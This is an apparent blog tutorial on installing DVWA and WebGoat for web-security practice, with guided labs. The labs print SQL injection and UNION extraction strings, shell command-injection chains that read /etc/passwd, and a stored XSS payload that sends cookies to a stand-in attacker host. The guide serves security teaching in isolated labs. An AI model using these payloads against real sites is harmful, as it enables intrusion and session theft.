Ethical Hacking #DVWA#WebGoat#vulnerable apps

How to Set Up DVWA and WebGoat for Safe Web Hacking Practice

Install vulnerable web apps for learning: DVWA via Docker, WebGoat setup, and guided labs for web security testing.

9 min read

DVWA (Damn Vulnerable Web Application) and WebGoat are intentionally insecure web applications designed to teach security vulnerabilities. They’re invaluable for learning in a safe, legal environment. This guide covers setup and basic usage for both platforms.

Why Use Vulnerable Web Apps?

  • Legal practice: Explicitly designed for testing, no legal risk
  • Controlled environment: You own the application, no external consequences
  • Repeatable scenarios: Revert to clean state and re-exploit
  • Guided learning: Each vulnerability has explanations and hints
  • No protection: No WAF, IDS, or defenses to bypass

Perfect for beginner to intermediate learners.

Part 1: DVWA Setup

Option A: Docker (Easiest)

Docker runs DVWA in a container, completely isolated from your system.

Prerequisites:

# Install Docker
sudo apt install docker.io -y

# Add user to docker group (avoid sudo)
sudo usermod -aG docker $USER
newgrp docker

Launch DVWA:

docker run --rm -it -p 80:80 vulnerables/web-dvwa

What this does:

  • --rm: Delete container after exit
  • -it: Interactive terminal
  • -p 80:80: Map container port 80 to host port 80
  • vulnerables/web-dvwa: Official DVWA image

Expected output:

Starting Apache web server...
MySQL started successfully
DVWA ready at http://localhost/DVWA/

Access DVWA:

Open browser and navigate to http://localhost/DVWA/

Default credentials:

Username: admin
Password: password

Configure difficulty (important):

  1. Log in
  2. Click DVWA Security (bottom-left)
  3. Set PHP_IDS: Disabled (for learning, no detection)
  4. Set Difficulty: Low (easiest for beginners)
  5. Click Submit

Now you’re ready to start exploiting.

Option B: VirtualBox Image

DVWA provides a pre-configured Linux VM with everything installed.

Download:

Visit https://github.com/digininja/DVWA

Download the OVA file (OpenVirtualBox Appliance format).

Import into VirtualBox:

# Import the OVA
VBoxManage import DVWA-*.ova

# Start the VM
VirtualBox

Select the DVWA VM and start it.

Access:

The VM displays its IP address on boot. Navigate to http://[VM-IP]/DVWA/

Credentials: admin/password

Option C: Manual Installation (For Advanced Users)

If you want full control, install manually:

  1. Apache web server
  2. PHP with MySQLi support
  3. MySQL database
  4. DVWA source code
sudo apt install apache2 mysql-server php php-mysqli -y
sudo systemctl start apache2 mysql

# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
cd DVWA
sudo cp config/config.inc.php.dist config/config.inc.php

# Configure database
sudo mysql -u root << 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF

# Set permissions
sudo chown -R www-data:www-data /var/www/html/DVWA
sudo chmod 755 /var/www/html/DVWA/config/

# Navigate to http://localhost/DVWA/setup.php and click Create Database

Part 2: WebGoat Setup

WebGoat is OWASP’s Java-based training application. More modern than DVWA but requires Java.

Pull and run:

docker run -p 8080:8080 webgoat/goatandwolf

Access:

Navigate to http://localhost:8080/WebGoat

First login:

Register a new account (any username/password you choose).

Standalone Installation

Requirements:

  • Java 11 or higher
  • Maven (for building from source)

Download:

# Download latest JAR
wget https://github.com/WebGoat/WebGoat/releases/download/v[version]/webgoat-[version].jar

# Run
java -jar webgoat-[version].jar

WebGoat starts on http://localhost:8080/WebGoat

DVWA Vulnerability Labs

Once logged in, DVWA presents vulnerabilities in order. Start with these:

1. SQL Injection (Simple)

Path: Vulnerabilities → SQL Injection

Scenario: User search by ID

User ID: 1' OR '1'='1 --

Click Submit. The injection should display all users.

Why it works: The query becomes:

SELECT * FROM users WHERE user_id='1' OR '1'='1' --'

The OR '1'='1' always returns true.

Escalation:

Use UNION-based injection to extract data:

1' UNION SELECT NULL, user(), version() --

2. Command Injection

Path: Vulnerabilities → Command Injection

Scenario: Ping a host

127.0.0.1; cat /etc/passwd

The semicolon chains commands. You can execute arbitrary system commands.

Try:

127.0.0.1 && whoami
127.0.0.1 | id
127.0.0.1 `whoami`

3. Broken Access Control

Path: Vulnerabilities → Insecure Direct Object References (IDOR)

Scenario: View user profiles by ID

URL: http://localhost/DVWA/vulnerabilities/view/?id=1
Change to: http://localhost/DVWA/vulnerabilities/view/?id=2

You can view other users’ profiles without authorization.

Escalation: Enumerate IDs to find admin profile:

?id=0, ?id=-1, ?id=999, ?id=admin

4. XSS (Cross-Site Scripting)

Path: Vulnerabilities → XSS (Stored)

Scenario: Comment section that stores input unsanitized

Name: <script>alert('XSS')</script>
Message: Test comment

Submit. Every visitor’s browser executes the script.

Try more malicious payload:

<img src=x onerror="fetch('http://attacker.com/?cookie='+document.cookie)">

This exfiltrates cookies to an attacker’s server.

5. CSRF (Cross-Site Request Forgery)

Path: Vulnerabilities → CSRF

Scenario: Change user password without proper CSRF token validation

The app might accept requests without verifying the token.

WebGoat Lessons

WebGoat has structured lessons:

  1. Getting Started → Introduction and setup
  2. A1 Injection → SQL, OS, LDAP injection
  3. A2 Broken Authentication → Weak authentication mechanisms
  4. A3 Broken Access Control → Authorization bypasses
  5. A5 Broken Access Control → IDOR and privilege escalation
  6. A7 Cross-Site Scripting → Stored and reflected XSS
  7. Cryptography → Weak encryption, encoding vs. encryption

Each lesson has:

  • Explanation
  • Vulnerable code
  • Hands-on challenge
  • Solution walkthrough

Practical Testing Workflow

Setup both for parallel learning:

# Terminal 1: DVWA
docker run -p 80:80 vulnerables/web-dvwa

# Terminal 2: WebGoat
docker run -p 8080:8080 webgoat/goatandwolf

Testing Session Example

1. Reconnaissance:

  1. Open DVWA
  2. Log in (admin/password)
  3. Set Security to Low
  4. Navigate to SQL Injection
  5. Observe the search form and URL structure

2. Vulnerability Analysis:

  1. Try normal input: 1 → displays user #1
  2. Try quotes: 1' → error (indicates possible SQL)
  3. Try comment: 1' -- → different response (query structure changed)

3. Exploitation:

  1. Try: 1' OR '1'='1' -- → all users displayed
  2. Try: 999' UNION SELECT NULL, user(), version() --
  3. Document findings

4. Escalation:

  1. Extract database name: version()
  2. Extract user list: information_schema.tables
  3. Dump passwords: SELECT password FROM users

5. Report:

Document:

  • Vulnerability type: SQL Injection
  • Attack vector: User ID search field
  • Payload: 1' OR '1'='1' --
  • Impact: Full database access
  • Mitigation: Use prepared statements

Security Notes

These apps simulate complete vulnerability. In real scenarios:

  • Web Application Firewalls block simple payloads
  • Input validation rejects obvious injections
  • Protections (CSRF tokens, rate limiting) are common
  • Logging and monitoring detect attacks

DVWA and WebGoat disable these to teach concepts. Real exploitation is more nuanced.

Progression Path

  1. Start with DVWA (Low): Understand basic vulnerabilities
  2. Move to DVWA (Medium): Evade simple protections
  3. Try DVWA (High): Advanced techniques required
  4. WebGoat lessons: Structured learning
  5. Real challenges: HackTheBox, TryHackMe, CTF competitions

Resetting Databases

If you break something or want a clean slate:

DVWA (Docker):

# Stop and remove container
docker stop <container_id>
docker rm <container_id>

# Run fresh
docker run --rm -it -p 80:80 vulnerables/web-dvwa

DVWA (Standalone):

# Re-run database setup
# Navigate to /setup.php and click "Create Database"

WebGoat (Docker):

Same as DVWA — remove container and re-run.

Troubleshooting

Can’t access DVWA:

# Check Docker is running
sudo systemctl status docker

# Check port 80 is available
sudo lsof -i :80

# Try different port
docker run -p 8000:80 vulnerables/web-dvwa
# Access at http://localhost:8000/DVWA/

WebGoat won’t start:

# Ensure Java is installed
java -version

# Check port 8080
lsof -i :8080

# Increase memory if needed
docker run -p 8080:8080 -e JAVA_OPTS="-Xmx512m" webgoat/goatandwolf

Database connection errors:

DVWA database sometimes needs manual setup:

# Inside DVWA, navigate to /setup.php
# Click "Create/Reset Database"

Conclusion

DVWA and WebGoat are your safe playgrounds for learning web security. They remove legal and technical barriers, letting you focus on understanding vulnerabilities.

Spend time here before moving to real targets. Every major web attack type is represented:

  • Injection flaws
  • Broken authentication
  • Access control failures
  • Sensitive data exposure
  • XML external entity (XXE)
  • Broken access control
  • Security misconfiguration
  • XSS and CSRF
  • Insecure deserialization

Master these on intentionally vulnerable apps, and you’ll recognize them in the wild.

Use DVWA and WebGoat to learn. Use that knowledge responsibly on authorized targets only.

#ethical hacking #Docker #web hacking practice #vulnerable apps #WebGoat #DVWA

// related articles

ethical-hacking SQL Injection Explained: How It Works and How to Practice Safely 11 min read ethical-hacking TryHackMe Beginner's Guide 2026 7 min read ethical-hacking CEH v13 Certification Study Guide 2026 7 min read